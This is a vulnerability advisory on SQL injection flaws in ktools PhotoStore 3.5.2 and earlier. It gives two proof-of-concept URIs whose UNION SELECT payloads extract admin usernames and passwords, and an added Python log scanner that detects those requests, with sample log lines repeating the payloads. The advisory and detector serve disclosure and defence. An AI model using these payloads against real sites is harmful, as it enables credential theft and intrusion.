

Title Ktools PhotoStore Multiple SQL Injection Vulnerabilities
Published 2008-05-10-12:00AM
Updated 2008-05-10-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  DNX
Vulnerable  ktools PhotoStore 3.5.2
ktools PhotoStore 3.5.1
ktools PhotoStore 3.5
ktools PhotoStore 3.4.3
ktools PhotoStore 3.4.2
ktools PhotoStore 3.4
ktools PhotoStore 3.2.1
ktools PhotoStore 3.2
ktools PhotoStore 3.1.1
ktools PhotoStore 3.1
ktools PhotoStore 2.9.8
ktools PhotoStore 2.5
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available:

http://www.example.com/photostore/about_us.php?gid=0'%20union%20select%201,concat(username,0x2f,password),3%20from%20mgr_users%20/*

http://www.example.com/photostore/manager/image_details_editor.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,username,11,12,13,password,15,16%20FROM%20mgr_users
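
A detection check for the two requests above, added here as an example and not part of the original advisory: it scans web-server access-log lines for the gid and id parameters of the two affected scripts and reports any value that is not a plain integer after percent-decoding. The integer-only expectation, the combined log format and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path suffix -> parameter used in the advisory's proof-of-concept URIs.
WATCHED = {
    "/about_us.php": "gid",
    "/manager/image_details_editor.php": "id",
}
# Assumption: both parameters should only ever carry a non-negative integer ID.
INTEGER = re.compile(r"[0-9]+")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def suspicious_requests(log_lines):
    """Return (line_no, parameter, decoded_value) for non-integer watched parameters."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        for suffix, param in WATCHED.items():
            if not url.path.lower().endswith(suffix):
                continue
            # parse_qs percent-decodes values, so %20 or %27 cannot hide the payload.
            values = parse_qs(url.query, keep_blank_values=True).get(param, [])
            for value in values:
                if not INTEGER.fullmatch(value):
                    hits.append((line_no, param, value))
    return hits


# Constructed sample log lines; lines 2 and 4 carry the advisory's PoC requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2008:10:00:01 +0000] "GET /photostore/about_us.php?gid=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/May/2008:10:00:07 +0000] "GET /photostore/about_us.php?gid=0\'%20union%20select%201,concat(username,0x2f,password),3%20from%20mgr_users%20/* HTTP/1.1" 200 5300',
    '203.0.113.5 - - [10/May/2008:10:01:12 +0000] "GET /photostore/manager/image_details_editor.php?id=42 HTTP/1.1" 200 7410',
    '203.0.113.9 - - [10/May/2008:10:01:30 +0000] "GET /photostore/manager/image_details_editor.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,username,11,12,13,password,15,16%20FROM%20mgr_users HTTP/1.1" 200 7600',
    '203.0.113.7 - - [10/May/2008:10:02:00 +0000] "GET /photostore/search.php?q=o\'brien HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for line_no, param, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {param}={value!r}")
```

The same integer-only test applied server-side, before gid or id reaches a query, is the input validation the advisory's class names as missing.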



Copyright 2007, SecurityDot
Sat, 22 Nov 2008 22:27:46 +0000
